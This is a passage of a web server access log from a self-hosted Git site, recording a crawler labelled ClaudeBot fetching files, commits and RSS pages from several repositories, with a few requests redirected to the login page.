git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py?display=source" [Client 216.73.216.188] [Length 13884] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx" [Client 216.73.216.188] [Length 10081] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" [Client 216.73.216.188] [Length 10332] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 9867] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" [Client 216.73.216.188] [Length 11847] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json?display=source" [Client 216.73.216.188] [Length 13197] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13351] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt" -[15/Feb/2026:12:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services" [Client 216.73.216.188] [Length 9917] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" [Client 216.73.216.188] [Length 11299] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 12751] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets" [Client 216.73.216.188] [Length 10755] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 216.73.216.188] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py?display=rendered" [Client 216.73.216.188] [Length 10982] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md?display=source" [Client 216.73.216.188] [Length 22144] [Gzip 6.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" [Client 216.73.216.188] [Length 15983] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2FDebug%2Fnet8.0%2FOpcConnectionTest.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 21152] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 216.73.216.188] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" [Client 216.73.216.188] [Length 9892] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile?display=source" [Client 216.73.216.188] [Length 12473] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/nginx/proxy_host" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/nginx/proxy_host" -[15/Feb/2026:12:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig?display=source" [Client 216.73.216.188] [Length 11814] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 9899] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 10181] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 1084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets?display=source" [Client 216.73.216.188] [Length 11824] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py?display=rendered" [Client 216.73.216.188] [Length 10972] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10951] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json?display=source" [Client 216.73.216.188] [Length 11690] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 216.73.216.188] [Length 267] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 971] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 1854] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" [Client 216.73.216.188] [Length 11482] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2FDebug%2Fnet8.0%2FOpcConnectionTest.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 20649] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 9848] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 15793] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages" [Client 216.73.216.188] [Length 9975] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md?display=source" [Client 216.73.216.188] [Length 15796] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 1011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py?display=rendered" [Client 216.73.216.188] [Length 10968] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh?display=source" [Client 216.73.216.188] [Length 14933] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/project.assets.json" [Client 216.73.216.188] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 10104] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 216.73.216.188] [Length 9833] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/css/style.css?display=rendered" [Client 216.73.216.188] [Length 11203] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static" [Client 216.73.216.188] [Length 10168] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/database.sqlite" [Client 216.73.216.188] [Length 10865] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py?display=source" [Client 216.73.216.188] [Length 14303] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 13631] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 